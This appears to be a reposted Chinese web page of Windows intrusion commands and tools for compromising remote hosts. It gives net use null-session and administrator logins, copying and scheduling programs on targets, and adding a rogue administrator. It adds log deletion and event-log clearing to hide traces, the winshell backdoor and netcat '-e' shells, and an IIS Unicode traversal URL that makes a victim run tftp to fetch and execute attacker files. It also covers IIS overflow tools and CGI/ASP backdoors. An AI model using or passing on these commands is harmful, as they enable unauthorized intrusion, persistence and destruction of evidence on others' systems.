網管和***都必須知道的命令

經常使用的幾條NET命令:
  (與遠程主機創建空管鏈接) net use \\IP地址\ipc$ "" /use:""
  (以管理員身份登陸遠程主機) net use \\IP地址\ipc$ "密碼" /use:"Administrator"
  (傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑\程序 \\IP地址\admin$
  (查看遠程主機時間) net time \\IP地址
  (定時啓動某個程序) at \\IP地址 02:18 readme.exe
  (查看共享) net view \\IP地址
  (查看netbios工做組列表) nbtstat -A IP地址
  (將遠程主機C盤映射爲本身的F盤) net use f: \\IP地址\c$ ""/user:"Administrator"
  (這兩條把本身增長到管理員組): net user 用戶名 密碼 /add
  net localgroup Administrators 用戶名 /add
  (斷開鏈接) net use \\IP地址\ipc$ /delete
  掃尾:
  del C:\winnt\system32\logfiles\*.*
  del C:\winnt\ssytem32\config\*.evt
  del C:\winnt\system32\dtclog\*.*
  del C:\winnt\system32\*.log
  del C:\winnt\system32\*.txt
  del C:\winnt\*.txt
  del C:\winnt\*.log
  1、netsvc.exe
  下面的命令分別是列出主機上的服務項目、查尋和遠程啓動主機的「時間任務」服務:
  netsvc /list \\IP 地址
  netsvc schedule \\IP 地址 /query
  netsvc \\IP 地址 schedule /start
  2、OpenTelnet.exe
  遠程啓動主機的Telnet服務,並綁定端口到7878,例如:
  OpenTelnet \\IP 地址 用戶名 密碼 1 7878
  而後就能夠telnet到主機的7878端口,進入DOS方式下:
  telnet IP地址 7878
  3、winshell.exe
  一個很是小的***(不到6K),telnet到主機的7878端口,輸入密碼winshell,當看到CMD>後,可打下面的命令:
  p Path (查看winshell主程序的路徑信息)
  b reBoot (從新啓動機器)
  d shutDown (關閉機器)
  s Shell (執行後你就會看到可愛的「C:\>」)
  x eXit (退出本次登陸會話,此命令並不終止winshell的運行)
  CMD> [url]http://.../srv.exe[/url] (經過http下載其餘網站上的文件到運行winshell的機器上)
  4、3389登錄器,GUI方式登陸遠程主機的
  5、elsave.exe
  事件日誌清除工具
  elsave -s \\IP 地址 -l "application" -C
  elsave -s \\IP 地址 -l "system" -C
  elsave -s \\IP 地址 -l "security" -C
  執行後成功清除應用程序日誌,系統日誌, 安全 日誌
  6、hbulot.exe
  開啓win2kserver和winxp的3389服務
  hbulot [/r]
  使用/r表示安裝完成後自動重起目標使設置生效。
 
7、nc.exe(netcat.exe)
  一個很好的工具,一些腳本程序都要用到它,也可作溢出後的鏈接用。
  想要鏈接到某處: nc [-options] hostname port[s] [ports] ...
  綁定端口等待鏈接: nc -l -p port [-options] [hostname] [port]
  參數:
  -e prog 程序重定向,一旦鏈接,就執行 [危險!!]
  -g gateway source-routing hop point[s], up to 8
  -G num source-routing pointer: 4, 8, 12, ...
  -h 幫助信息
  -i secs 延時的間隔
  -l 監聽模式,用於入站鏈接
  -n 指定數字的IP地址,不能用hostname
  -o file 記錄16進制的傳輸
  -p port 本地端口號
  -r 任意指定本地及遠程端口
  -s addr 本地源地址
  -u UDP模式
  -v 詳細輸出——用兩個-v可獲得更詳細的內容
  -w secs timeout的時間
  -z 將輸入輸出關掉——用於掃描時
  8、TFTPD32.EXE
  把本身的電腦臨時變爲一臺FTP 服務器 ,讓肉雞來下載文件,tftp命令要在肉雞上執行,一般要利用Unicode漏洞或telnet到肉雞,例如:
   [url]http://IP[/url] 地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:\winnt\system32\文件名
  而後能夠直接令文件運行:
   [url]http://IP[/url] 地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
  9、prihack.exe是IIS的printer遠程緩衝區溢出工具
  idqover.exe是溢出idq的,選擇「溢出後在一個端口監聽」,而後用telnet鏈接它的監聽端口,若是溢出成功,一連它的端口,綁定的命令立刻執行。xploit.exe是一個圖形界面的ida溢出,成功之後winxp下須要打winxp。
  一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。而後用IE瀏覽器鏈接。
相關文章
相關標籤/搜索